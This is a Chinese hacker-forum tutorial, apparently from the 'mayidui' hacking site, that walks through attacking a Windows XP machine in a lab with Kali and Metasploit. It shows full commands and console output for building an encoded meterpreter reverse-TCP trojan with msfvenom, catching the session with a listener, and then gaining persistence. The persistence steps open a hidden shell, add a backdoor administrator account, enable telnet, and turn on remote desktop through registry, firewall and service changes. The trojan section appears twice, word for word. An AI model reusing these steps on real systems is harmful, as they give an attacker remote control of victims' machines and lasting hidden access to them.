漏洞利用-可举一反三

小皮
1450小皮首席执行运营官
思路技巧 2019-12-28 16:45:07
1450 思路技巧 2019-12-28 16:45:07
一:Metasploitable操作系统:靶机,攻击的目标
1:下载网址
https://sourceforge.net/projects/metasploitable/

2:用VMware打开

3:默认的登录账号和密码都是msfadmin
root用户的密码是msfadmin
4:设置靶机的ip地址 ,方便测试
root@kali:~# vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address 192.168.10.123
netmask 255.255.255.0
gateway 192.168.10.254
root@kali:~# /etc/init.d/networking restart


二:armitage管理工具,对目标进行发现和攻击


1:在命令行中开启数据库
root@kali:~# service postgresql start

2:点击左侧Metaspoit Framework按钮,开启framework

图片:图片1.png



3:在打开的Metaspoit终端里执行命令db_status,查看连接数据库的状态

图片:图片2.png



4:在msf命令行输入armitage,打开链接窗口,显示连接metasploit服务的基本信息,并点击connect按钮,在打开的新界面中点击“是”,显示连接进度,最终打开软件界面。


msf > armitage

图片:图片3.png


图片:图片4.png





图片:图片5.png




图片:图片6.png





5:找到hosts菜单--nmap scan--quick scan(OS detect),输入要扫描的网络,点确定。
要扫描的主机可以不关防火墙,之后就可以对目标靶机进行攻击

图片:图片7.png



三:入侵windows操作系统(xp的系统)
1:打开终端,输入以下命令,在目标主机上产生木马,默认放在root家目录中
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.10.30 LPORT=1234 -f exe > 77169.exe


No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
Final size of exe file: 73802 bytes


2:继续在终端输入命令msfconsole,启动msf
root@kali:~# msfconsole
                                                 
# cowsay++
____________
< metasploit >
------------
      \   ,__,
       \  (oo)____
          (__)    )\
             ||--|| *




      =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


msf >


3:在msf中输入以下命令加载后门
msf > use exploit/multi/handler
msf exploit(handler) >


4:设置本地计算机的ip地址以及监听端口号
msf exploit(handler) > set LHOST 192.168.10.30
LHOST => 192.168.10.30


msf exploit(handler) > set LPORT 1234
LPORT => 1234


5:执行命令exploit开始监听
msf exploit(handler) > exploit
[*] Exploit running as background job 0.


[*] Started reverse TCP handler on 192.168.10.30:1234
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.10.5
[*] Meterpreter session 1 opened (192.168.10.30:1234 -> 192.168.10.5:49819) at 2018-10-10 10:30:52 +0800




6:将之前生成的木马程序发送给目标主机,并运行,图形化复制粘贴过去
7:在本地计算机上开启控制通道


msf exploit(handler) > sessions 1
再 输入 shell即可远程。
8:对目标进行持续控制



一:启用telnet远程服务
入侵windows操作系统(xp的系统)
1:打开终端,输入以下命令,在目标主机上产生木马,默认放在root家目录中
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.10.30 LPORT=1234 -f exe > 77169.exe


No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
Final size of exe file: 73802 bytes


2:继续在终端输入命令msfconsole,启动msf
root@kali:~# msfconsole
                                                  
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *




       =[ metasploit v4.16.6-dev                          ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post        ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]


msf >


3:在msf中输入以下命令加载后门
msf > use exploit/multi/handler
msf exploit(handler) >


4:设置本地计算机的ip地址以及监听端口号
msf exploit(handler) > set LHOST 192.168.10.30
LHOST => 192.168.10.30


msf exploit(handler) > set LPORT 1234
LPORT => 1234


5:执行命令exploit开始监听
msf exploit(handler) > exploit
[*] Exploit running as background job 0.


[*] Started reverse TCP handler on 192.168.10.30:1234
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.10.5
[*] Meterpreter session 1 opened (192.168.10.30:1234 -> 192.168.10.5:49819) at 2018-10-10 10:30:52 +0800




6:将之前生成的木马程序发送给目标主机,并运行,
7:在本地计算机上开启控制通道
msf exploit(handler) > sessions 1


8:在通道中创建一个交互的shell,并且该shell是一个隐藏的进程
meterpreter > execute -H -f cmd –i
meterpreter > shell
9:创建一个Service_Account账户,并加入到管理员组
C:\Users\Administrator\Desktop>net user Service_Account mayidui1 /add
C:\Users\Administrator\Desktop>net localgroup administrators Service_Account /add
10、将Service_Account加入到TelnetClients组
C:\Users\Administrator\Desktop>net localgroup TelnetClients Service_Account /add


11、创建一个持久的telnet服务
C:\Users\Administrator\Desktop>exit
meterpreter > run gettelnet -e
12、windows目标中开启telnet服务——在控制面板中
 services.msc中将telnet服务开启
13、kali中telnet
root@kali:~# telnet 192.168.10.127




二、启用windows远程终端服务——为了图形化管理目标
1、获取一个通道
meterpreter > shell
2、修改注册表,开启远程桌面
C:\Users\Administrator\Desktop>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"/v fDenyTSConnections /t REG_DWORD /d 0 /f
3、添加防火墙规则,使远程桌面通过防火墙
C:\Users\Administrator\Desktop>netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
4、开启远程桌面服务
C:\Users\Administrator\Desktop>net start Termservice
5、设置远程桌面服务开机自启动
C:\Users\Administrator\Desktop>cd \
C:\>sc config Termservice start= auto

本文标题:漏洞利用-可举一反三
本文作者:小皮
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t3133.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan